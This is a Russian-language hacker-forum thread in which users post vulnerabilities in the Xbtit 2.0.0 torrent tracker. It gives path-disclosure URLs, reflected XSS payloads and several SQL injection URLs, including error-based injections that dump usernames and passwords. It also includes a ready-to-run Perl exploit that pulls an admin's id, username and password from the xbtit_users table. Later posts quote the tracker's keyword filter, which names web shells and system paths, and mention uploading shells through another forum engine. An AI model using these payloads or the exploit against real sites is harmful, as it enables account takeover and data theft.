Уязвимости Xbtit
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Уязвимости Xbtit - 2010-03-13 20:35:42.526666
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Xbtit 2.0.0 Спасибо всем кто помагал. Моего труда здесь вообще мало. Раскрытие путей. http://target.com/index.php?page=signup&act=signup&returnto[]= Ещё PHPSESSID=!@#$%^&*( Если создан хоть один топик в форуме index.php?page=forum&action=viewforum&forumid[]=
index.php?page=forum&action=viewtopic&topicid[]=
/ajaxchat/sendChatData.php Уязвимый кусок кода: if (!ini_get('register_globals')) {
extract($_POST, EXTR_SKIP);
}
$name = $n; # name from the form
$text = $c; # comment from the form
$uid = $u; # userid from the form Если не найден $_GET $_POST $_COOKIE n или c или u, выскакивает Notice, мол, переменная не найдена. quote:
index.php?page=users&searchtext[]= /index.php?page=allshout&sid[]=1 Пассивная XSS quote:
http://target.com//"><script>alert(/XSS/);</script> /index.php?page=edit&info_hash=HASHID&returnto=index.php";alert(/hello+world/);<!– SQL Injection. Требуются права админа index.php?page=admin&user=2&code=8355071'&do=pruneu Наврал , права пользователя нужны index.php?page=allshout&sid=1'&edit index.php?page=allshout&sid=1'&delete index.php?page=allshout&sid=1+and+substring(version(),1,1)=5/*&edit /ajaxchat/sendChatData.php?n=123\&c=,concat_ws(0x3a,user(),database(),version()),7)/*&u=2 Если не работает GET'ом, попробуйте POST'ом /ajaxchat/sendChatData.php?n=NAME\&c=,concat_ws(0x3a,user(),database(),version()),2)/*&u=2 /index.php?page=admin&user=2&code=134469&do=category&action=edit&id=5 and substring(version(),1)=5 (Blind SQL-инъекция. Необходимы права админа.) /index.php?page=admin&user=2&code=134469&do=style&action=edit&id=1+and+substring(version(),1)=5 (Blind SQL-инъекция. Необходимы права админа.) Ну и собственно вот скуля есть, не блинд. quote:
/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((SELECT+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)–++&by=ASC Постинг в чат от другого юзера: quote:
ajaxchat/sendChatData.php?n=NAME&c=TEXT&u=UID Если register_globals = On - GET'ом открывать, в противном случае - POST'ом. Спасибо большое HAXTA4OK, mailbrush.
|
|
|
RE: Уязвимости Xbtit - 2010-03-23 20:37:56.110000
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
В журнале писали о багах (ктото с ачата) Но в общем неплохо)
|
|
|
RE: Уязвимости Xbtit - 2010-03-24 05:28:33.376666
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Да собственно баги не новые, просто вот это quote:
/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((SELECT+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)–++&by=ASC Новая бага как бы =\ // Здесь как то посты удалять можно?
|
|
|
RE: Уязвимости Xbtit - 2010-03-24 13:39:00.913333
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
quote:
/ Здесь как то посты удалять можно? мне напиши, я удалю
|
|
|
RE: Уязвимости Xbtit - 2010-03-28 10:17:24.460000
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Нашёл ещё. /index.php?page=torrents&active=2&order=speed+or(1,1)=(select+count(0),concat((select+database()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)–++&by=ASC order=speed обязательно speed ;) И по традиции сплойт.
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# xbtit Torrent Tracker SQL INJECTION EXPLOIT #\n";
print "# Author: Ctacok (Russian) #\n";
print "# Blog : www.Ctacok.ru #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";
print "# Hello HAXTA4OK, mailbrush (Thanks) #\n";
print "##############################################################\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vuln = "+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)";
$doc = get($host.$path."index.php?page=torrents&active=2&order=speed".$vuln."--+&by=ASC");
if ($doc =~ /:::(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin username: $2";
print "\n[+] Admin password: $3";
}else{
print "\n My name is Fail, Epic Fail... \n"
}
Надо что-бы торренты были открыты, без авторизации что бы можно было смотреть торренты :)
|
|
|
RE: Уязвимости Xbtit - 2010-03-31 21:25:48.800000
|
|
|
kazrulit
Сообщений: 79
Оценки: 0
Присоединился: 2009-07-22 14:23:31.770000
|
Там вроде стоит фильтр. Если там <script> или там union select у них там в админке как hacking attempt выйдет.
|
|
|
RE: Уязвимости Xbtit - 2010-04-01 04:36:27.896666
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
quote:
//the bad words… $ban['union']='select'; //$ban['update']='set'; $ban['set password for']='@'; $ban2=array('delete from','insert into','<script', '<object', '.write', '.location', '.cookie', '.open', 'vbscript:', '<iframe', '<layer', '<style', ':expression', '<base', 'id_level', 'users_level', 'xbt_', 'c99.txt', 'c99shell', 'r57.txt', 'r57shell.txt','/home/', '/var/', '/www/', '/etc/', '/bin', '/sbin/', '$_GET', '$_POST', '$_REQUEST', 'window.open', 'javascript:', 'xp_cmdshell', '.htpasswd', '.htaccess', '<?php', '<?', '?>', '</script>'); Ну в скулях там union ненужен собственно, а шелленг заливаеться через SMF к примеру.
|
|
|
RE: Уязвимости Xbtit - 2010-04-01 04:46:31.290000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
'c99.txt', 'c99shell', 'r57.txt', 'r57shell.txt' [sm=ag.gif][sm=ag.gif][sm=ag.gif]
|
|
|
RE: Уязвимости Xbtit - 2010-04-01 17:52:52.770000
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
quote:
ORIGINAL: Pashkela quote:
'c99.txt', 'c99shell', 'r57.txt', 'r57shell.txt' [sm=ag.gif][sm=ag.gif][sm=ag.gif] Ага, привет кулхацкерам)))))000
|
|
|
|
|